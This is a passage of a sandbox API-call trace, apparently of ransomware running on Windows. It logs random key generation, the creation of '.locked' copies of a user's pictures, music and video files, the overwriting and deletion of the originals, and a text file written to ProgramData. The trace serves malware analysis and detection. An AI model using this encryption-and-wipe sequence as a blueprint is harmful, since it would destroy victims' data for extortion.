dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0312.538] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.585] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125dce88 | out: lpMode=0x125dce88) returned 0 [0312.585] WriteFile (in: hFile=0x1c8, lpBuffer=0x13e44000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dce78, lpOverlapped=0x0 | out: lpBuffer=0x13e44000*, lpNumberOfBytesWritten=0x125dce78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.620] CloseHandle (hObject=0x1c8) returned 1 [0312.621] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\k84JGTm.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\k84jgtm.mp3")) returned 1 [0312.693] SetEvent (hEvent=0x22c) returned 1 [0312.693] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.721] SetEvent (hEvent=0x1e8) returned 1 [0312.721] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.723] WriteFile (in: hFile=0x200, lpBuffer=0x13a36000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dae78, lpOverlapped=0x0 | out: lpBuffer=0x13a36000*, lpNumberOfBytesWritten=0x125dae78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.746] CloseHandle (hObject=0x200) returned 1 [0312.746] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\yjOkz_fxpa.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\yjokz_fxpa.wav")) returned 1 [0312.795] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0312.800] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\A3FeS_cred _Q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\a3fes_cred _q.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0312.801] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0312.801] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\A3FeS_cred _Q.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\a3fes_cred _q.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0312.857] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.971] SetEvent (hEvent=0x150) returned 1 [0312.971] SetEvent (hEvent=0x22c) returned 1 [0312.971] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0312.971] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.988] SetEvent (hEvent=0x190) returned 1 [0312.988] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.994] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\GtPsnmjRu_gpfrBo.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\gtpsnmjru_gpfrbo.wav")) returned 1 [0313.009] SetEvent (hEvent=0x190) returned 1 [0313.009] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.016] SetEvent (hEvent=0x1f0) returned 1 [0313.016] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.025] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.039] SetEvent (hEvent=0x1b8) returned 1 [0313.039] SetEvent (hEvent=0x190) returned 1 [0313.039] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.058] SetEvent (hEvent=0x20c) returned 1 [0313.058] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.064] SetEvent (hEvent=0x1b8) returned 1 [0313.064] SetEvent (hEvent=0x22c) returned 1 [0313.064] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.111] SetEvent (hEvent=0x22c) returned 1 [0313.148] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\Qun29tcX.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\qun29tcx.wav")) returned 1 [0313.161] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.399] SetEvent (hEvent=0x214) returned 1 [0313.399] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.400] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.443] SetEvent (hEvent=0x12c) returned 1 [0313.443] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.502] SetEvent (hEvent=0x20c) returned 1 [0313.502] SetEvent (hEvent=0x1e8) returned 1 [0313.502] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.504] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.519] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0313.521] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0313.521] SetEvent (hEvent=0x150) returned 1 [0313.521] SetEvent (hEvent=0x1dc) returned 1 [0313.521] SetEvent (hEvent=0x1f0) returned 1 [0313.521] SetEvent (hEvent=0x190) returned 1 [0313.526] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0313.528] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.528] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0313.529] SetEvent (hEvent=0x22c) returned 1 [0313.529] SetEvent (hEvent=0x220) returned 1 [0313.529] SetEvent (hEvent=0x14c) returned 1 [0313.529] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.530] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0313.530] SetEvent (hEvent=0x150) returned 1 [0313.530] SetEvent (hEvent=0x220) returned 1 [0313.530] SetEvent (hEvent=0x14c) returned 1 [0313.530] SetEvent (hEvent=0x22c) returned 1 [0313.533] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\8IVRLBXd.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\8ivrlbxd.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0313.535] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x123a3e88 | out: lpMode=0x123a3e88) returned 0 [0313.535] WriteFile (in: hFile=0x19c, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a3e78, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x123a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.556] CloseHandle (hObject=0x19c) returned 1 [0313.557] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\8IVRLBXd.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\8ivrlbxd.jpg")) returned 1 [0313.647] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0313.648] SetEvent (hEvent=0x14c) returned 1 [0313.648] SetEvent (hEvent=0x22c) returned 1 [0313.648] SetEvent (hEvent=0x220) returned 1 [0313.652] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0313.657] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.657] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0313.659] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.659] SetEvent (hEvent=0x1e8) returned 1 [0313.659] SetEvent (hEvent=0x190) returned 1 [0313.659] SetEvent (hEvent=0x20c) returned 1 [0313.659] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.663] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0313.663] SetEvent (hEvent=0x150) returned 1 [0313.663] SetEvent (hEvent=0x190) returned 1 [0313.663] SetEvent (hEvent=0x20c) returned 1 [0313.663] SetEvent (hEvent=0x1e8) returned 1 [0313.685] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0313.689] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.689] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0313.689] SetEvent (hEvent=0x20c) returned 1 [0313.689] SetEvent (hEvent=0x1e8) returned 1 [0313.689] SetEvent (hEvent=0x190) returned 1 [0313.698] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0313.700] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.700] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0313.701] SetEvent (hEvent=0x12c) returned 1 [0313.701] SetEvent (hEvent=0x214) returned 1 [0313.701] SetEvent (hEvent=0x1b8) returned 1 [0313.701] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.701] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0313.701] SetEvent (hEvent=0x150) returned 1 [0313.701] SetEvent (hEvent=0x1b8) returned 1 [0313.702] SetEvent (hEvent=0x214) returned 1 [0313.705] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0313.706] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0313.706] SetEvent (hEvent=0x214) returned 1 [0313.706] SetEvent (hEvent=0x1b8) returned 1 [0313.707] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0313.822] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.822] SwitchToThread () returned 1 [0313.825] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0313.826] SetEvent (hEvent=0x1b8) returned 1 [0313.826] SetEvent (hEvent=0x12c) returned 1 [0313.826] SetEvent (hEvent=0x214) returned 1 [0313.826] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.827] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0313.827] SetEvent (hEvent=0x150) returned 1 [0313.827] SetEvent (hEvent=0x214) returned 1 [0313.827] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\A3FeS_cred _Q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\a3fes_cred _q.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0313.849] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0313.933] SetEvent (hEvent=0x214) returned 1 [0313.933] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0313.933] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.046] SetEvent (hEvent=0x190) returned 1 [0314.046] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.047] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.089] SetEvent (hEvent=0x190) returned 1 [0314.089] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.100] SetEvent (hEvent=0x1b8) returned 1 [0314.100] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.113] SetEvent (hEvent=0x22c) returned 1 [0314.113] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.116] SetEvent (hEvent=0x1e8) returned 1 [0314.116] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.148] SetEvent (hEvent=0x214) returned 1 [0314.148] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0314.152] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.257] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\JFXeWTcsVuNh u.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\jfxewtcsvunh u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0314.257] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0314.257] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\JFXeWTcsVuNh u.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\jfxewtcsvunh u.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0314.386] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.525] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0314.525] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0314.525] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392120 | out: pbBuffer=0x12392120) returned 1 [0314.525] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0314.525] WriteFile (in: hFile=0x1c0, lpBuffer=0x12ba1000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x12ba1000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0314.528] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0314.533] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0314.533] SetEvent (hEvent=0x150) returned 1 [0314.533] SetEvent (hEvent=0x1b8) returned 1 [0314.533] SetEvent (hEvent=0x20c) returned 1 [0314.533] SetEvent (hEvent=0x220) returned 1 [0314.533] ReadFile (in: hFile=0x200, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e3d68*=0x4b13, lpOverlapped=0x0) returned 1 [0314.535] WriteFile (in: hFile=0x1c0, lpBuffer=0x12ba2000*, nNumberOfBytesToWrite=0x4b13, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesWritten=0x125e3d74*=0x4b13, lpOverlapped=0x0) returned 1 [0314.678] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.779] SetEvent (hEvent=0x1b8) returned 1 [0314.779] ReadFile (in: hFile=0x200, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0314.779] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.827] CloseHandle (hObject=0x1c0) returned 1 [0314.827] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0314.976] CloseHandle (hObject=0x200) returned 1 [0314.976] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0314.976] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0314.976] WriteFile (in: hFile=0x200, lpBuffer=0x12702400*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x12702400*, lpNumberOfBytesWritten=0x125e3e64*=0x79, lpOverlapped=0x0) returned 1 [0314.976] CloseHandle (hObject=0x200) returned 1 [0314.976] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\JFXeWTcsVuNh u.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\jfxewtcsvunh u.bmp")) returned 1 [0315.043] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.055] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.057] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.106] SetEvent (hEvent=0x14c) returned 1 [0315.106] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0315.133] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.133] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0315.137] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.138] SetEvent (hEvent=0x190) returned 1 [0315.138] SetEvent (hEvent=0x14c) returned 1 [0315.138] SetEvent (hEvent=0x12c) returned 1 [0315.138] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.139] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0315.139] SetEvent (hEvent=0x12c) returned 1 [0315.139] SetEvent (hEvent=0x14c) returned 1 [0315.139] SetEvent (hEvent=0x1f0) returned 1 [0315.139] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.215] SetEvent (hEvent=0x214) returned 1 [0315.215] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.311] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\NrMhV7-QFwSdl541.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\nrmhv7-qfwsdl541.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0315.362] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.412] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0315.412] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.469] SetEvent (hEvent=0x14c) returned 1 [0315.469] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.478] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.859] SetEvent (hEvent=0x190) returned 1 [0315.859] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.869] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0315.938] SetEvent (hEvent=0x190) returned 1 [0315.938] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0316.234] SetEvent (hEvent=0x22c) returned 1 [0316.234] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0316.333] SetEvent (hEvent=0x214) returned 1 [0316.333] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.253] SetEvent (hEvent=0x198) returned 1 [0318.253] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.255] SetEvent (hEvent=0x220) returned 1 [0318.255] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.258] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390040*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x12390040*, lpNumberOfCharsWritten=0x12659a24*=0xc) returned 1 [0318.300] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\FUcQzp6TqxWfef2jhFpt.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\fucqzp6tqxwfef2jhfpt.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0318.300] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0318.300] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\FUcQzp6TqxWfef2jhFpt.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\fucqzp6tqxwfef2jhfpt.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0318.653] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0318.653] SetEvent (hEvent=0x134) returned 1 [0318.653] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0318.656] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.656] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0318.658] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.658] SetEvent (hEvent=0x220) returned 1 [0318.658] SetEvent (hEvent=0x22c) returned 1 [0318.658] SetEvent (hEvent=0x134) returned 1 [0318.658] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.660] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0318.660] SetEvent (hEvent=0x150) returned 1 [0318.660] SetEvent (hEvent=0x22c) returned 1 [0318.660] SetEvent (hEvent=0x134) returned 1 [0318.660] SetEvent (hEvent=0x220) returned 1 [0318.661] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0318.661] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: 